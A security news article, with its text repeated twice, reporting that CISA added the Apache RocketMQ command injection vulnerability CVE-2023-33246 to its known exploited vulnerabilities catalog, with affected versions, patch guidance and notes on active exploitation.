CISA has added a vulnerability to its catalog that cannot be ignored.
The US Cybersecurity and Infrastructure Protection Agency (CISA) has added the critical vulnerability CVE-2023-33246 (CVSS: 9.8) affecting Apache RocketMQ to its catalog of known exploited vulnerabilities.
Some Apache RocketMQ components, including NameServer, Broker, and Controller, are accessible from the extranet and do not have permission checks. Attackers can use the vulnerability to execute arbitrary commands on behalf of users of the system running RocketMQ. A hacker can cause an error by using the configuration update function or by tampering with the contents of the RocketMQ protocol.
The vulnerability affects Apache RocketMQ 5.1.0 and below. Users are advised to upgrade to version 5.1.1 and higher for using RocketMQ 5. x or 4.9.6 and higher for using RocketMQ 4. x.
Apache's recommendations were published in May , but CISA added the issue to KEV after the security company VulnCheck published technical details of the vulnerability. According to the VulnCheck report, the CVE-2023-33246 flaw allows a remote unauthorized attacker to update the RocketMQ broker configuration to abuse command injection. It is noted that the operation of the error continues from June 2023.
The researchers noted that the vulnerability is exploited through a special protocol for remote interaction with the RocketMQ broker ports (by default, 10909 and 10911). Neither Shodan nor Censys can detect this protocol, which makes it difficult to determine the actual number of vulnerable systems.
The researchers explained that CVE-2023-33246 is associated with only one botnet, but they believe that at least several attackers are actively exploiting the flaw in real-world conditions. Experts recommend deleting the RocketMQ instance from the Internet and checking the broker's configuration for signs of exploitation. CISA also instructed federal agencies to eliminate the vulnerability by September 27, 2023.
The US Cybersecurity and Infrastructure Protection Agency (CISA) has added the critical vulnerability CVE-2023-33246 (CVSS: 9.8) affecting Apache RocketMQ to its catalog of known exploited vulnerabilities.
Some Apache RocketMQ components, including NameServer, Broker, and Controller, are accessible from the extranet and do not have permission checks. Attackers can use the vulnerability to execute arbitrary commands on behalf of users of the system running RocketMQ. A hacker can cause an error by using the configuration update function or by tampering with the contents of the RocketMQ protocol.
The vulnerability affects Apache RocketMQ 5.1.0 and below. Users are advised to upgrade to version 5.1.1 and higher for using RocketMQ 5. x or 4.9.6 and higher for using RocketMQ 4. x.
Apache's recommendations were published in May , but CISA added the issue to KEV after the security company VulnCheck published technical details of the vulnerability. According to the VulnCheck report, the CVE-2023-33246 flaw allows a remote unauthorized attacker to update the RocketMQ broker configuration to abuse command injection. It is noted that the operation of the error continues from June 2023.
The researchers noted that the vulnerability is exploited through a special protocol for remote interaction with the RocketMQ broker ports (by default, 10909 and 10911). Neither Shodan nor Censys can detect this protocol, which makes it difficult to determine the actual number of vulnerable systems.
The researchers explained that CVE-2023-33246 is associated with only one botnet, but they believe that at least several attackers are actively exploiting the flaw in real-world conditions. Experts recommend deleting the RocketMQ instance from the Internet and checking the broker's configuration for signs of exploitation. CISA also instructed federal agencies to eliminate the vulnerability by September 27, 2023.
